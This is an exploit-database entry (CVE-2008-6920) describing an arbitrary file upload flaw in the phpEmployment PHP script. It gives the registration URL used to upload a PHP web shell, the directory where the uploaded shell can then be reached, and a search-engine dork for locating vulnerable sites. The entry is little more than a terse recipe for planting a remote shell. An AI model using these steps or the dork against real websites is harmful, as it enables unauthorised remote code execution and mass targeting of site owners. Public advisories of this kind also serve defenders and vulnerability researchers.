phpEmployment - 'PHP Upload' Arbitrary File Upload

Author: ahmadbady
type: webapps
platform: php
port: 
date_added: 2008-12-22 
date_updated: 2017-01-23 
verified: 1 
codes: OSVDB-50981;CVE-2008-6920 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpEmployment.zip

****(remote shell upload)****

script: phpEmployment

***************************************************************************
download from:http://www.w2b.ru/download/phpEmployment.zip

***************************************************************************
www.site.com/path/auth.php?mode=regnew&adtype=job

shell: www.site.com/path/photoes/number_shell.php

----------------------------------------------------------------------------------------
dork:"powered by phpEmployment"
------------------------------------------------------------------------------------------
**************************************************


Author: ahmadbady

**************************************************

# milw0rm.com [2008-12-23]